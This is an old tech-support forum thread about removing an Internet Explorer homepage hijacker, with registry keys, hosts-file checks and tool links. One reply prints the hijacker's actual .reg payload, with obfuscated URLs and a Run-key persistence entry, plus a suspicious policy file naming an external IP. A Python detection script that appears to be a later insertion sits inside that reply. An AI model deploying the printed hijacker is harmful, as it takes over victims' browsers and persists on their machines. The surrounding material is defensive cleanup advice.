Solved

Unknown virus or malicious file

Posted on 2004-04-27
4,273 Views
Last Modified: 2007-12-19
I have a serious problem. I believe I've been infected by something that seems to act like adware, like a virus and a cookie at the same time. It makes my Internet Explorer run improperly. What it does is that it sets my web homepage to freednshost.info, and every time I change it to another webpage, as soon as I close the program and open it again it's back to freednshost.info. Also, every time I click a link on any Internet webpage it will send me to that same page, freednshost.info, and I get some sort of search engine with an irritating little stick man dancing up and down on the page. This virus also puts unsolicited Internet Explorer shortcuts on my active desktop and it shows mortgage ads on my options menu in Internet Explorer.
 

I've tried everything. I've scanned my computer, looked for the infected file manually, and downloaded the latest virus definitions for my Norton Antivirus, but it doesn't seem to help.
What do I do?
Question by:datinfo
12 Comments
 
LVL 49

Expert Comment

by:sunray_2003
ID: 10934730

After installing them, first update them and then run them.

Spyware/Adware removal tools:
------------------------------

What is spyware : http://www.spychecker.com/spyware.html

SpyBot-S&D : http://www.safer-networking.org/

Ad-aware : http://www.webattack.com/download/dladaware.shtml 

CWShredder: http://www.softpedia.com/public/cat/10/17/10-17-150.shtml

HijackThis : http://www.spychecker.com/program/hijackthis.html 
 
LVL 49

Expert Comment

by:sunray_2003
ID: 10934732
Check these registry entries

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Bar
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Page
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
HKCU\Software\Microsoft\Internet Explorer\SearchURL
HKCU\Software\Microsoft\Internet Explorer\Main\Default_Page_URL
HKCU\Software\Microsoft\Internet Explorer\Main\Default_Search_URL
HKCU\Software\Microsoft\Internet Explorer\Search\SearchAssistant
HKCU\Software\Microsoft\Internet Explorer\Search\CustomizeSearch
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Search Bar


and remove freednshost.info. Before doing that, back up your registry.
 

Author Comment

by:datinfo
ID: 10934758
Thanks! That was really fast! I just posted the question! I honestly didn't expect such a fast answer!
 
LVL 49

Accepted Solution

by:
sunray_2003 earned 125 total points
ID: 10934761
Also check the hosts file:

Windows 95/98/Me c:\windows\hosts

Windows NT/2000/XP Pro  c:\winnt\system32\drivers\etc\hosts

Windows XP Home c:\windows\system32\drivers\etc\hosts


and make sure only the line below is present (IP address first, then the name):

127.0.0.1  localhost
 
LVL 49

Expert Comment

by:sunray_2003
ID: 10934762
datinfo,
> I honestly didn't expect such a fast answer!

You will be surprised every time you post .. Of course, I should be online. LOL!!
 
LVL 49

Expert Comment

by:sunray_2003
ID: 10935166
Thanks for the super fast feedback
 

Expert Comment

by:knuthf
ID: 10982115
Whoops,
You forgot the most important key of them all: the "RUN" keys
(RUN/RUNONCE). In particular:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
If this has a value, e.g.
            sys    REG_SZ  "regedit -s sys.reg"
delete this, and any other line that does not belong to anything you want to start.
Search the %WINDIR% directory for files recently updated; same with e.g. WINNT\system32. The last files updated should only be the Performance log files.

Your "sys.reg" is downloaded from a site that I am trying to find. The problem is that it first installs itself as an IE "cookie" in the Temporary Internet Files, and then after a while it is moved. I had the following installed on February 26, to wake up on April 17 at 19:40, and slip through all virus scanners:

REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"HOMEOldSP"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"Search Bar"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
"Search Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"HOMEOldSP"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"Search Bar"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
"Search Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"PrivacyAdvanced"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"sys"="regedit -s sys.reg"

----------------
That is one. The other is
<?xml version="1.0"?>
<securitypolicy version="1">
  <fwdebuglog debugflags="0x00000000" maxdebuglog="0"/>
  <lockupinfo server="208.185.174.60" port="0" enable="true"/>
  <startuphookafd wsockvermajor="0x00050000" wsockverminor="0x089319cb" enable="true"/>
  <processes>
    <process name="fssm32.exe" openprocessaction="allow">
      <md5table>
        <md5hex>91feb4e9-8cf1e8e5-4f6f306a-e1399374</md5hex>
        <md5hex>2f856f29-4d155a8c-c4ebb124-3bfeb9d4</md5hex>
        <md5hex>6ea475f6-d34c3c6d-7a8a6845-a525d6e6</md5hex>
      </md5table>
    </process>
  </processes>
</securitypolicy>
...
- but here the IP address is a dead give-away: ZoneLabs, to fetch an executable.
Use Security Policy to prevent changes to the RUN keys; some tools like PortPro will guard the keys and notify you before they are changed. The web pages are malicious, while most believe that viruses spread with mail attachments.

I have in another response recommended that all file names in "system32" be changed, with e.g. the 1st and 4th letters uppercase and the rest lowercase. You make some convention that allows you to see in Task Manager when an intrusion has been made; e.g. the fssm32.exe above would not be FssM32.exe, so KILL IT.

Make your own search page and distribute it, or force everyone to Google, then "brand" IE: that prevents all users from changing the search page, homepage and security settings.
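The following is an added example, not code from this thread or from any of the tools mentioned in it. It automates, offline, the checks sunray_2003 listed (the Internet Explorer Start/Search values and the hosts file) against the kind of .reg sample knuthf posted above: it parses a REGEDIT4 export, percent-decodes the obfuscated URLs (the sample's `%74%6B...` form), flags any Start Page/Search value whose host is not on an assumed allowlist, flags Run/RunOnce entries that silently re-import a .reg file, and reports hosts-file lines beyond the loopback entry. The sample export and hosts file are constructed for the example; `TRUSTED_HOSTS` is an assumption you would adapt to your own environment.

```python
import re
from urllib.parse import unquote

# IE values the thread names as hijack targets (same path under HKCU and HKLM).
IE_VALUES = {
    r"software\microsoft\internet explorer\main": {
        "start page", "search page", "search bar", "default_page_url",
        "default_search_url", "homeoldsp"},
    r"software\microsoft\internet explorer\search": {
        "searchassistant", "customizesearch"},
}
RUN_KEYS = {r"software\microsoft\windows\currentversion\run",
            r"software\microsoft\windows\currentversion\runonce"}
# Assumption: hosts the user would legitimately configure; anything else is flagged.
TRUSTED_HOSTS = {"www.google.com", "www.msn.com"}


def parse_reg(text):
    """Parse a REGEDIT4 export into {key_path: {value_name: string}}.
    Only REG_SZ ("name"="value") lines are kept; dword/hex values are skipped."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = re.fullmatch(r'"([^"]+)"="((?:[^"\\]|\\.)*)"', line)
        if m and current is not None:
            # .reg files escape backslashes and quotes inside string values
            value = m.group(2).replace('\\"', '"').replace("\\\\", "\\")
            keys[current][m.group(1)] = value
    return keys


def host_of(url):
    """Percent-decode a URL (the hijacker hides its host as %74%6B...) and return its host."""
    m = re.match(r"[a-z][a-z0-9+.-]*://([^/?#]+)", unquote(url), re.I)
    return m.group(1).lower() if m else None


def audit_reg(text):
    """Return (key, value_name, decoded_value) for IE URLs pointing off the allowlist
    and for Run/RunOnce entries that re-import a .reg file with 'regedit -s'."""
    findings = []
    for key, values in parse_reg(text).items():
        _, _, path = key.partition("\\")
        path = path.lower()
        for name, value in values.items():
            if path in IE_VALUES and name.lower() in IE_VALUES[path]:
                host = host_of(value)
                if host and host not in TRUSTED_HOSTS:
                    findings.append((key, name, unquote(value)))
            elif path in RUN_KEYS and re.search(r"\bregedit(?:\.exe)?\s+[-/]s\b", value, re.I):
                findings.append((key, name, value))
    return findings


def audit_hosts(text):
    """Return every active hosts-file line other than '127.0.0.1 localhost', whitespace-normalised."""
    extra = []
    for raw in text.splitlines():
        line = " ".join(raw.split("#", 1)[0].split())
        if not line:
            continue
        ip, *names = line.split()
        if ip == "127.0.0.1" and names == ["localhost"]:
            continue
        extra.append(line)
    return extra


# Constructed sample export, mirroring the values posted in this thread.
SAMPLE_REG = r"""REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"Search Page"="http://www.google.com/"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"PrivacyAdvanced"=dword:00000001

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"sys"="regedit -s sys.reg"
"ctfmon"="C:\\WINDOWS\\system32\\ctfmon.exe"
"""

# Constructed hosts file: the loopback line plus two entries a hijacker might add.
SAMPLE_HOSTS = """# Hosts file
127.0.0.1       localhost
127.0.0.1       update.example.com
192.0.2.10      search.example.net
"""

if __name__ == "__main__":
    for key, name, value in audit_reg(SAMPLE_REG):
        print(f"SUSPECT  [{key}] {name} = {value}")
    for line in audit_hosts(SAMPLE_HOSTS):
        print(f"HOSTS    {line}")
```

To run it against a live machine, export the keys first (e.g. `regedit /e ie.reg "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer"` and the same for the Run keys) and feed the file's text to `audit_reg`; the percent-decoded host is what you then look up with the whois tools knuthf mentions. A Run entry of the form `regedit -s <file>` deserves attention on its own, since it reapplies the hijack silently at every logon regardless of what you fix in the IE keys.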
 

Expert Comment

by:knuthf
ID: 10982130
I know I posted a virus.
But I believe in educating by real examples, not just mumbo jumbo talking.
Please beware: it is a virus that will set IE to search somewhere else.
 

Expert Comment

by:knuthf
ID: 10982160
IP address resolution:
See http://www.geektools.com/whois.php

It is good because it links in with the regional whois databases.

Another tool is the ID server found at www.grc.com - Steve Gibson's page.
 

Expert Comment

by:mormanb
ID: 11136352
I am not able to delete the vsconfig.xml. It says the process is being used by another process. I restored my registry; how can I get rid of this vsconfig.xml?
 

Expert Comment

by:knuthf
ID: 11163949
Rename it to e.g. vsconfig.xml.vir, and designate Notepad as the open/edit program for .vir.

Delete *.vir the next time you have rebooted the system.

This also allows you to rename files that you do not trust and prevent them from being loaded at boot-up. You can then inspect them with suitable tools, and if the file is e.g. part of MS administrative tools, you just rename the file back to vsconfig.xml...
 

Expert Comment

by:knuthf
ID: 11163974
Identify the files you have verified with a combination of uppercase/lowercase names,
e.g. VscOnfig.xml, as described in another posting: here the first and fourth characters are in upper case.